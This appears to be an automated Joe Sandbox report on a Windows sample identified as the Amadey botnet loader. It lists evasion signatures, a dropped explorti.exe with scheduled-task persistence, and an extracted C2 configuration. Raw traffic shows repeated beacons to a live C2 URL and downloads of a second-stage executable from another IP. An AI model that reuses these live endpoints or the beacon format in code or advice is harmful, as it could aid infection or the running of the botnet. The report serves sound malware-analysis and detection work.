Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1502468
MD5:0f2694844eb16391e15196e17e545f0b
SHA1:cb6cbd6a90349afa4624a221b3350af44feb4d71
SHA256:53f9b3b2ea25424baf94da442973f4efd71e1218a3b837600334d97898ebfd7e
Tags:exe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0F2694844EB16391E15196E17E545F0B)
    • explorti.exe (PID: 7436 cmdline: "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" MD5: 0F2694844EB16391E15196E17E545F0B)
  • explorti.exe (PID: 7456 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 0F2694844EB16391E15196E17E545F0B)
  • explorti.exe (PID: 8104 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 0F2694844EB16391E15196E17E545F0B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
SourceRuleDescriptionAuthorStrings
00000002.00000003.1699866762.0000000004D10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000001.00000003.1699390143.0000000004D20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000002.00000002.1740065067.0000000000531000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000006.00000003.2279702263.0000000005070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            6.2.explorti.exe.530000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              2.2.explorti.exe.530000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                1.2.explorti.exe.530000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0.2.file.exe.d60000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    No Sigma rule has matched
                    Timestamp:2024-09-01T17:37:04.208529+0200
                    SID:2856147
                    Severity:1
                    Source Port:49775
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-09-01T17:37:19.841016+0200
                    SID:2856122
                    Severity:1
                    Source Port:80
                    Destination Port:49775
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: http://185.215.113.19/Vi9leo/index.phpOAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exededAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.phpAvira URL Cloud: Label: malware
                    Source: http://185.215.113.16/steam/random.exe6522427fAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.php0Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.phpWindowsAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.php00Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exeAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.phpbAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500mAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exelAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exe00Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exem32Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.phpoftAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.phpw_bAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.php0=Avira URL Cloud: Label: phishing
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: explorti.exe.8104.6.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJoe Sandbox ML: detected
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49775 -> 185.215.113.19:80
                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49775
                    Source: Malware configuration extractorIPs: 185.215.113.19
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 37 32 44 37 32 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A78B72D72B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 31 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000051000&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000052000&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000052000&unit=246122658369
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 35 32 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000052000&unit=246122658369
                    Source: Joe Sandbox ViewIP Address: 185.215.113.19 185.215.113.19
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0053BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_0053BD60
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: unknownHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500m
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe00
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe6522427f
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeded
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exel
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exem32
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php0
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php00
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php0=
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpO
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpb
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpw_b

                    System Summary

                    barindex
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0053E4406_2_0053E440
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_005730686_2_00573068
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00534CF06_2_00534CF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00567D836_2_00567D83
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0057765B6_2_0057765B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00534AF06_2_00534AF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0057777B6_2_0057777B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00576F096_2_00576F09
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_005787206_2_00578720
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00572BD06_2_00572BD0
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9996691427595629
                    Source: file.exeStatic PE information: Section: wugfyyhr ZLIB complexity 0.9944699754901961
                    Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9996691427595629
                    Source: explorti.exe.0.drStatic PE information: Section: wugfyyhr ZLIB complexity 0.9944699754901961
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/2
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile created: C:\Users\user\AppData\Roaming\1000051000\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
